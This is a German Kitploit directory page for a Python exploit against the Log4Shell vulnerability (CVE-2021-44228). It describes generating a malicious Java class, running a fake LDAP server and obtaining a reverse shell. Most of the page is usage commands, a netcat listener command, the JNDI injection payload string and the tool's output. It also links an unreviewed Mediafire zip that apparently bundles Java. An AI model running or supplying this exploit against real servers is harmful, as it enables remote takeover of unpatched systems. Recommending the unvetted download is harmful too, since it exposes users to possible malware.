Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j-Exploit-CVE-2021-44228 — Python-basierter Exploit für CVE-2021-44228 (Log4Shell), der eine bösartige Java-Klasse generiert, einen gefälschten LDAP-Server einrichtet und eine Reverse Shell über JNDI-Injektion bereitstellt. | Kitploit
Tools/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

Python-basierter Exploit für CVE-2021-44228 (Log4Shell), der eine bösartige Java-Klasse generiert, einen gefälschten LDAP-Server einrichtet und eine Reverse Shell über JNDI-Injektion bereitstellt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Log4j-Exploit-CVE-2021-44228

Log4Shell Schwachstellen-Testwerkzeug https://log4shell.tools/

Exploit mit bereits enthaltenem Java, um kein Konto erstellen zu müssen usw..

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Grundkonzept von log4j

Was ist JNDI

JNDI ist eine Java-API für einen Verzeichnisdienst, der es Java-Software-Clients ermöglicht, Daten und Ressourcen über einen Namen zu entdecken und zu suchen.

Was ist LDAP

LDAP ist ein Verzeichniszugriffsprotokoll. LDAP kann verwendet werden, um Benutzernamen und Passwörter mit Servern wie Docker, Jenkins, Kubernetes, OpenVPN und Linux Samba zu validieren. LDAP Single Sign-On kann auch von Systemadministratoren verwendet werden, um den Zugriff auf eine LDAP-Datenbank zu steuern.

WER MEHR ÜBER DIE SCHWACHSTELLE ERFAHREN MÖCHTE, FINDET HIER DIE DOKUMENTATION:

https://www.lunasec.io/docs/blog/log4j-zero-day/

EXPLOIT OHNE JAVA INKLUSIVE

https://github.com/kozmer/log4j-shell-poc
Tool herunterladen